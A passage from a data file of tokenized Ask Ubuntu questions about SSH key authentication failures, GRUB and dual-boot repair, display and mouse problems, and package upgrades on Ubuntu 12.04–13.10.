ubuntu-6ubuntu0.1 debug1 : remote protocol version 2.0 , remote software version openssh_6.2p2 ubuntu-6ubuntu0.1 debug1 : match : openssh_6.2p2 ubuntu-6ubuntu0.1 pat openssh* debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 192.168.0.2 '' from file `` /home/steven/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/steven/.ssh/known_hosts:3 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-gcm @ openssh.com , aes256-gcm @ openssh.com , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5-etm @ openssh.com , hmac-sha1-etm @ openssh.com , umac-64-etm @ openssh.com , umac-128-etm @ openssh.com , hmac-sha2-256-etm @ openssh.com , hmac-sha2-512-etm @ openssh.com , hmac-ripemd160-etm @ openssh.com , hmac-sha1-96-etm @ openssh.com , hmac-md5-96-etm @ openssh.com , hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , umac-128 @ openssh.com , hmac-sha2-256 , hmac-sha2-512 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5-etm @ openssh.com debug1 : kex : server- > client aes128-ctr hmac-md5-etm @ openssh.com none debug2 : mac_setup : found hmac-md5-etm @ openssh.com debug1 : kex : client- > server aes128-ctr hmac-md5-etm @ openssh.com none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa ee:88:5a:07:7d:3b:91:83:75:58:58 : cc : a4:3b:19:75 debug3 : load_hostkeys : loading entries for host `` 192.168.0.2 '' from file `` /home/steven/.ssh/known_hosts '' debug3 : load_hostkeys : found key type ecdsa in file /home/steven/.ssh/known_hosts:3 debug3 : load_hostkeys : loaded 1 keys debug1 : host '192.168.0.2 ' is known and matches the ecdsa host key . debug1 : found key in /home/steven/.ssh/known_hosts:3 debug1 : ssh_ecdsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/steven/.ssh/id_rsa ( 0x7fa49fc8c970 ) , debug2 : key : /home/steven/.ssh/id_dsa ( ( nil ) ) , debug2 : key : /home/steven/.ssh/id_ecdsa ( ( nil ) ) , debug1 : authentications that can continue : publickey debug3 : start over , passed a different list publickey debug3 : preferred gssapi-keyex , gssapi-with-mic , publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/steven/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey debug1 : trying private key : /home/steven/.ssh/id_dsa debug3 : no such identity : /home/steven/.ssh/id_dsa : no such file or directory debug1 : trying private key : /home/steven/.ssh/id_ecdsa debug3 : no such identity : /home/steven/.ssh/id_ecdsa : no such file or directory debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey ) . i have almost stared myself to dead on it , this is my sshd_conf on the server : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication no # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes allowusers steven i already restarted my sshd daemon and ssh service a lot , it did n't work .
409216	laptop is very slow if its not using power cable	so if i only use laptops battery my laptop is very very slow . and when i use power cable there is no problems . is there a some powersaving or something and how can i fix it ?
409217	how to get ubuntu installed and running for development ( i.e . ruby on rails )	ok , i am mostly a windows user but for for learning ror at work , i had to get used to a mac . once i did i found that i enjoyed it , especially the terminal , i could load up projects in moments what would take a fair bit longer on windows . now obviously mac is n't linux but they both work similarly at least in regards to things like terminal ( correct me if i 'm wrong ) . so i could have that same flexibility at home i installed ubuntu on a separate ssd , but things started to go wrong . i installed gnome 3.1 and my cursor vanished , but i fixed it . however i was still stuck with unity ( hate this desktop ) and doing 'gnome-shell -- replace ' did n't do anything and my mouse cursor on the login screen was invisible so i could n't change it by clicking on it . i installed zsh as my terminal shell ( like i had on mac ) and oh-myz-zsh but nothing i did in the zshrc file did anything , none of the theme stuff changed , none of the plugins i selected worked . none of the terminal commands worked i.e . rails = no command found , git = no command found , subl ( sublime text editor ) = no command found . and then , when i tried closing down , everything went wonky and now it loads up all funny , ( e.g . the text menu on the terminal window vanishes and re-appears constantly ) . now , i need to get this working for work related purposes so can some one explain to me , how to : 1 ) get zsh and oh-my-zsh working properly ( i honestly prefer zsh to bash ) 2 ) install ruby , rails , git , sublime and get all the nice terminal commands working 3 ) get gnome working 4 ) anything else you might recommend to any that help me , thank you very much , this has been driving me nuts like nothing else .
409222	after ubuntu upgrade the cursor of the mouse is no more displayed	i have just upgraded ubuntu and restarted . the problem is that when ubuntu started the cursor was no more displayed . i know that it is there because when i pass over a link it is underlined or when i pass over the launch bar it is shown the tool tip with the name of the application . the only thing that misses is the cursor . i have already tried the solution described in this page but with no result . how can i show the cursor , or if it is not possible how can i restore the pc at the moment before the upgrade ? i 'm working on ubuntu 13.10 . update : if i open the control panel ( i search it from the dashboard ) , the cursor appears , but i have to do it every time i restart ubuntu . moreover the window of the control panel is as in the image ( last time there were not the background green ) . control panel window is not the only program with the window distorted , there it also nautilus .
409223	upgrade php - php5 is already the newest version . - but it is not	followed steps on update server php version to 5.4.10 via the command line and finnaly i get message that it is newest . but it is 5.36 - its far from newest . i want at least 5.37 so my laravel framework would work good , but actually there is much never version : http : //php.net/archive/2014.php # id2014-01-10-1 can you help me to upgrade ?
409226	the hdmi does not provide sound	i have a10-6800 amd apu and the hdmi port is off the motherboard ( asrock fm2a88x-itx+ ) . the system is running 13.10 . i bought a new hdmi cable and swapped them out to see if that worked . it did not work . the hdmi does not appear in the sound settings section , however my wireless headset/mic does show up and works perfectly when selected . need help .
409230	ubuntu 13.10 unbootable after broken installlation from live cd	hello dear ubuntu users you are my last hope to some how rescue my ubuntu , '' i am running ubuntu saucy salamander on an intel dual core 2,6 500gb , windows xp dual alongside a dual boot with windows xp . tried installing ubuntu 13.10 via live cd but the installation process got corrupted and grub messed up . later i tried the knoppix live to live to fix the system but without effect . later i also tried super grub live cd and am stuck with > super grub rescue mode starting > now i was able to install wubi install on xp and start ubuntu . when i start gparted in ubuntu . i ca n't unmount the xp drive because on an error umount : /host : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) . i 'd like to format the 500gb drive and install ubuntu . what need i to do to to fix grub to be able to fix the partitions to reinstall from scratch ? i need your help , please ? any suggestions ? please feel free to ask ! ! ! ! i made some screen shoots but it seems my reputation is too low . yours , ruben kurz
409231	whenever xscreensaver locks my screen my keyboard and mouse stops responding	i have installed ubuntu 12.04 . i uninstalled gnome screensaver and got xscreensaver working almost perfect . the only problem i am having is when my laptop is running xscreensaver for more than 5 minutes key strokes or touch pad are not recognized so i have to hard reset my laptop to be able to work because no matter what i do xscreensaver do not come off ... . and i know that my laptop is not suspended or locked because those options are set to off , but if i disable the xscreensaver through caffeine it sat off and my laptop never get the problem described . last time i got this situation i was listening music with rythmbox and i tried to turn down the volume when the screen was already `` possessed '' by xscrennsaver and nothing happened , so no keystroke , no touch pad , no volume control , nothing worked ... .had to hard reset my laptop once more . will not use xscreensaver until there is a solution for it , i like it very much but will not risk my hard drive . any one know how to solve this ?
409233	resize pdf files but with different for width and height	i need to resize a pdf ( to remove the margins ) . it 's not an image in pdf , it 's a book . but , of course , the upper/lower margins are thinner than the left/right ones . so i was wondering whether there was a way , in ubuntu , to resize a pdf but with different resizing factors for horizontal and vertical resize .
409234	starting over with ssh on local machine	i am using a ubuntu 13.10 box to communicate with another local server , bitbucket ( for git ) and a remote web host . i have decided that i do not like my current ssh key setup because things were not working the way they were supposed to , so i deleted the ssh keys on the remote accounts and am free to upload new ones at will . for tidiness sake , i want to get rid of all existing ssh keys on my local machine and start over . is it okay to simply delete the contents of the ~/.ssh directory , or is there a right way to do this ?
409239	blinking cursor , black screen after installing ubuntu 12.04	i have been using ubuntu for a long time , recently i have installed ubuntu in dual boot , but after installation when restart computer and choose ubuntu from grub , it stuck on a black screen with blinking cursor . i have tried many solutions , but still no luck . i have tried starting using nomodeset and similar solutions . using live usb start try ubuntu and uninstall nvidia driver and then reboot the system , this time i successfully used ubuntu but problem is that in this situation when i boot into windows , all the usb ports stop working . when i used the following method from ubuntu live cd in try ubuntu , i am able to boot ubuntu installation , but if i switched off the power of the computer and start the computer again , i am facing the same problem , blinking cursor on boot . # remove existing drivers sudo apt-get remove nvidia* sudo apt-get purge nvidia* # housekeeping sudo apt-get clean sudo apt-get autoclean # handle any errors to due incomplete apt-get operations sudo dpkg -- configure -a sudo apt-get update sudo apt-get upgrade # remove xorg/x11/xfree86 references to graphics drivers sudo rm /etc/x11/xorg.conf sudo apt-get install ubuntu-desktop # clean up and unmount everything exit sudo umount /mnt/sys sudo umount /mnt/proc sudo umount /mnt/dev sudo umount /mnt exit the output of fdisk in try ubuntu is displayed below . it is not showing * in front of linux , why it not showing * ? disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000b69dd device boot start end blocks id system /dev/sda1 * 63 512007614 256003776 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 512008190 609665023 48828417 5 extended partition 2 does not start on physical sector boundary . /dev/sda3 609665024 976771071 183553024 7 hpfs/ntfs/exfat disk /dev/sdb : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d8748 device boot start end blocks id system /dev/sdb1 2048 48828415 24413184 83 linux /dev/sdb2 48830462 97656831 24413185 5 extended /dev/sdb5 48830464 97656831 24413184 82 linux swap / solaris disk /dev/sdc : 7933 mb , 7933526016 bytes 255 heads , 63 sectors/track , 964 cylinders , total 15495168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x13bb8e7c device boot start end blocks id system /dev/sdc1 * 2048 15495167 7746560 7 hpfs/ntfs/exfat please guide me .
409242	external monitor wo n't show login screen	i 'm using a laptop with external monitor ( laptop screen disabled ) . i had a power failure in our house so laptop ( without battery ) closed , i had a lot of stuff opened and something broke because ubuntu was not able to boot , so i went though recovery mode and it was ok except for one thing . login screen will not appear on external monitor as it did before . the blue xubuntu loading picture appears first , but then it freezes and login screen pops up only on laptop ( with different background picture , which changes if i plug/unplug the vga cable ) , after login , it works fine . can you please help me ?
409243	update notifier does n't work [ cache issue ]	the update notifier does n't notify me when updates are available . sometime ago i had a similar problem and this worked : sudo rm /var/lib/update-notifier/dpkg-run-stamp sudo rm /var/lib/update-notifier/updates-available sudo rm /var/lib/apt/periodic/update-success-stamp but it does't work in this case : sudo /usr/lib/update-notifier/update-motd-updates-available -- force e : unknown error : « < class 'keyerror ' > » ( `` the cache has no package named 'wine1.7-i386 ' '' ) i also tried : sudo apt-get clean sudo apt-get auto-clean sudo apt-get clean all but it did n't work either . anyone knows how to fix it ? moray33 @ jose : ~ $ sudo apt-get check leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho moray33 @ jose : ~ $ sudo dpkg -- audit moray33 @ jose : ~ $ dpkg -s /var/lib/apt/periodic/ /var/lib/update-notifier/ apt : /var/lib/apt/periodic update-notifier-common , ubuntu-release-upgrader-core , update-manager-core : /var/lib/update-notifier
409244	how can i run command in a folder without changing my current directory to it ?	may be it seems strange for you , but i want to run command in a specific folder without changing the current folder in the shell . example - this is what i usually do : ~ $ cd .folder ~/.folder $ command -- key ~/.folder $ cd .. ~ $ another_command -- key though i want something like this : ~ $ .folder command -- key ~ $ another_command -- key is it possible ?
409250	can not connect to windows nt share from nautilus	i navigate to the share i want to connect to . nautilus the prompts me for a username , domain and password . when i click connect , i am returned to the same username/password screen . i can connect to the share using the mount command .
409253	phpmyadmin not longer working after updating to php5.5 on lts12.04	after i upgrade to php5.5 like in this thread how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ? my phpmyadmin is not working after i try to access to over my apache2 webinterface . error 404 page not found has anyone a solution for this problem ? remove and try to install it new was no success
409264	merge partitions without loosing my data	the situation : i have two partitions in my ubuntu 12.04 the first is / on /dev/sda1 ( primary ) the second is /home on /dev/sda5 ( extended ) the outpust of sudo fdisk -l is device boot start end blocks id system /dev/sdb1 * 2048 58660863 29329408 83 linux /dev/sdb2 58662910 234440703 87888897 5 extended /dev/sdb5 58662912 234440703 87888896 83 linux i want to merge the /home partition to the / partition without loosing my data. ? ! is it possible ? ! how to do it ?
409265	lost internet connection after ( fail ) apparmor installation	please , i would truly thank any advice on how to solve this issue : i have ubuntu gnome 13.10 64bits and i tried to install apparmor using the normal procedure : sudo add-apt-repository ppa : apparmor-upload/apparmor-2.8 sudo apt-get update sudo apt-get install apparmor i got two fail messages and i tried again with this command apt-get install apparmor apt-get install apparmor-utils apparmor-profiles apparmor-notify with error messages as well i rebooted the computer ( i had been intalling wine and some programs with it and i thought maybe that would solve the issue ) now however i lost my internet connection both wired and wireless ... and in the network window in ubuntu the wireless and wired switches get automatically to the off position after a period of time ... please help !
409266	how to print new data on the same line ?	hello guys i always use sudo apt-get install < package-name > for installing any pacakge and every time i run this command i observe one thing every time it says downloading some packages ( 78 % ) this line once printed never changes its position but instead it keeps on updating itself with percentage values.while other things are changing this line remains constant ! how do they do it ? i know this is not a typical askubuntu question but as a programmer i am very interested to find out the answer . thanks in advanced !
409268	ubuntu pointer moves on its own	i plugged my razer mouse into my ubuntu laptop today . i did not like the preset sensitivity and acceleration : benjamin @ benjamin-lenovo-ideapad-y510p : ~ $ xinput -- list-props 12 device 'razer razer orochi 2013 ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 260 ) : 0 device accel constant deceleration ( 261 ) : 1.000000 device accel adaptive deceleration ( 262 ) : 1.000000 device accel velocity scaling ( 263 ) : 10.000000 device product id ( 250 ) : 5426 , 57 device node ( 251 ) : `` /dev/input/event5 '' evdev axis inversion ( 264 ) : 0 , 0 evdev axes swap ( 266 ) : 0 axis labels ( 267 ) : `` rel x '' ( 143 ) , `` rel y '' ( 144 ) , `` rel vert wheel '' ( 259 ) button labels ( 268 ) : `` button left '' ( 136 ) , `` button middle '' ( 137 ) , `` button right '' ( 138 ) , `` button wheel up '' ( 139 ) , `` button wheel down '' ( 140 ) , `` button horiz wheel left '' ( 141 ) , `` button horiz wheel right '' ( 142 ) , `` button side '' ( 254 ) , `` button extra '' ( 255 ) , `` button forward '' ( 256 ) , `` button back '' ( 257 ) , `` button task '' ( 258 ) , `` button unknown '' ( 253 ) , `` button unknown '' ( 253 ) , `` button unknown '' ( 253 ) , `` button unknown '' ( 253 ) evdev middle button emulation ( 269 ) : 0 evdev middle button timeout ( 270 ) : 50 evdev third button emulation ( 271 ) : 0 evdev third button emulation timeout ( 272 ) : 1000 evdev third button emulation button ( 273 ) : 3 evdev third button emulation threshold ( 274 ) : 20 evdev wheel emulation ( 275 ) : 0 evdev wheel emulation axes ( 276 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 277 ) : 10 evdev wheel emulation timeout ( 278 ) : 200 evdev wheel emulation button ( 279 ) : 4 evdev drag lock buttons ( 280 ) : 0 so i edited those properties with : benjamin @ benjamin-lenovo-ideapad-y510p : ~ $ xinput -- set-prop 12 `` device accel constant deceleration '' 2 benjamin @ benjamin-lenovo-ideapad-y510p : ~ $ xinput -- set-prop 12 `` device accel velocity scaling '' 1 everything was working great . after a few minutes the mouse started acting strange . it would make short jerky motions and clicks . i tried unplugging the mouse and this continued . this makes me think maybe it was a touchpad issue ? at the time my laptop was closed and i was attached to an external monitor . for completion : benjamin @ benjamin-lenovo-ideapad-y510p : ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=15 [ slave pointer ( 2 ) ] ⎜ ↳ razer razer orochi 2013 id=12 [ slave pointer ( 2 ) ] ⎜ ↳ razer razer orochi 2013 id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ video bus id=10 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=16 [ slave keyboard ( 3 ) ] ↳ dell dell usb entry keyboard id=17 [ slave keyboard ( 3 ) ]
409272	how to instal ubuntu on a macbook after hd upgrade ?	i recently upgraded my hard drive to 1tb in my macbook ( model no a1342 ) , after the upgrade my macbook turned on to a flashing folder with a question mark on it . i did some research online on this problem and it turns out that i need to reinstall the operating system . now i do n't have my mac os install dvd and my applications install dvd that came with the macbook since i let a friend borrow them sometimes last summer and he never returned them . according to apple i need these two disks to fix this problem , i was wondering if there is anyway to install ubuntu on my macbook without installing the mac os and if yes could someone walk me through the install ?
409273	cant ' use `valgrind function profiler` due to `` no private key file given . '' error	i 'm trying to use valgrind function profiler inside ubuntu sdk but when i start the app i receive this error : error : `` /usr/bin/valgrind '' could not be started : no private key file given . what can i do ?
409274	blank console after fresh install of 12.04.03	i have seen this question asked a number of times but none of the answers i 've tried work for me . i 've seen answers about plymouth , about grub , and about vesa drivers so i screwed with all of that but none of it helps . i am trying to install 12.03.4 server ( with no xwindows ) on a blade server ( cs24ty , basically an old dell blade server ) . the install goes fine , and the boot process starts ok : bios comes up ok grub menu does its thing , everything is fine post-grub , various things start to happen . the last message i see is the one about installing the swap partition . after that , 70 % of the time the screen just goes blank . no blinking cursor , no alternate vtys ( ctl-alt-f1 through f8 give nothing ) . the other 30 % of the time i get a regular login prompt on the console ; alternate vtys work fine as well . it shifts resolution a few times ( 'normal ' text - > some odd size - > some small text size ) . i have a 24 '' fairly recent dell with a vga cable directly from server to monitor - no kvm switchbox , no gender-benders , nothing else . in the past i 'd had ubuntu desktop , centos and windows installed on this server and they all worked fine . this is n't a problem with the monitor or the cable or the graphics board ; if i boot a centos or windows install disk on this machine everything works 100 % of the time . in either case the system comes up ; i can ssh into it and get package updates , etc . so i think it 's related with the tty drivers or something in that area . i was afraid that it was trying to come up in graphics mode , so i followed the steps in : http : //virtual-drive.in/2012/05/20/ubuntu-12-04-text-boot/ but that gave no change at all . how do i fix this ? i do n't even know where to look - i 'm a network guy , i have n't done any real sysadmin stuff in 15 years . thanks !
409275	sudo nautilus vs su	as i have learnt that being a super-user in linux/ubuntu we can unlock those task which is being hide out from other user so to avoid messing with the files and directories.now i want to know upto which extent does superuser work with files.now that i have got my phpmyadmin files in /opt/lampp/phpmyadmin i want to configure my config.inc.php i found that with a superuser i cant edit and save the changes permission deinied . so far i have done is sudo passwd root then typed in my user pass and then password for unix and confirm . now i logged in as root by su and then password . i could not edit the changes.i found with sudo nautilus i could do the task and also copy and paste files from my home directory to other partition which i created that could not be done with a su . and 1 more thing idk but can a normal user easily change root password as its only need to type in user password .
409278	no bootable devices | win8 uefi + ubuntu | after boot-repair `` winefi detected , do you ... ''	i have a dell precision m6700 with win8 preinstalled . wanted to install ubuntu . i am not an expert on grub/boot/uefi stuff , so followed advice on different forums . did the following : unchecked `` turn on fast startup '' option in win8 turned off secure boot created free space for ubuntu in win8 disk management ( it had 3 primary partitions : recovery , efi , c with win8 installed on it ) installed ubuntu from a pen-drive using `` something else '' option . ( swap , / , /home ) . as advised i pointed to `` /dev/sdb '' for installing . after restarting i still could run only win8 . i entered ubutu live ( pen-drive ) and used boot-repair . it found a `` winefi detected , do you want to backup and rename the files ? '' problem . i ( stupidly ) clicked yes . now i ca n't boot anything . there is only `` no bootable device -- strike f1 to retry boot ... '' . tried to undo the thing using again ubuntu live ( pen-drive ) , chose the '' restore efi backups '' option of boot-repair , but did not help at all . could you please advise ? i 'm getting a bit anxious . // added : the boot-info report : http : //paste.ubuntu.com/6798994
409279	flash does not work	flash player does not work properly on my computer . it looks like this . renistal did n't solve issue .
409284	text only is distorted in ubuntu 13.10 with intel graphics	letters occasionally display distorted in browsers , file managers , terminals , etc . images are unaffected . i have an intel pentium dual core cpu with integrated graphics , and an ssd . i should also mention that when i highlight the text it becomes legible . as you can see in the line `` as i 'm starting this because there is another thread '' thread is distorted . i have tried to option suggestion provided by you guys . i also updated my intel graphics driver . do you think it could have something to do with the samsung ssd ? remember although this happened in the browser , it happens everywhere other than the launcher .
409288	dual booting ubuntu 12.04 and windows 7 on separate hard drives	i have ubuntu 12.04 lts 64bit installed on one hard drive and windows 7 installed on another hard drive . i can boot into each find when only one hard drive is plugged in . with both plugged in and in ubuntu , running update-grub does not find the windows 7 installation . with both hard drives plugged in i can not boot windows . the motherboard is an msi 990xa-gd55 . i had installed ubuntu first . unplugged the ubuntu drive to install windows to avoid overwriting the mbr ( assuming windows still does that these days ) . edit : i think that windows only boots when the efi boot option is selected in the bios , whereas usually the hard drive is specified . have i somehow managed to install one as efi and one as mbr ? if so what does that actually mean , is this why grub can not see the windows installation ? i would ideally have windows as an option in the grub menu . is this possible ?
409295	no dual boot , windows 7 loads up	i have windows 7 ent , and i have installed ubuntu 12.04 lts from the windows itself ( im guessing it was wubi install ) . it was working great via dual boot , and i loved ubuntu when i decided to remove windows 7 . so i have uninstalled it using `` osuninstall '' from ubuntu , and it `` removed '' windows , when actually i got bootmgr is missing error and nothing would boot up . i finally got it fixed with windows 7 installation dvd , so now only windows is loading , without boot option for me to choose from . how do i retreive my dual-boot selection ?
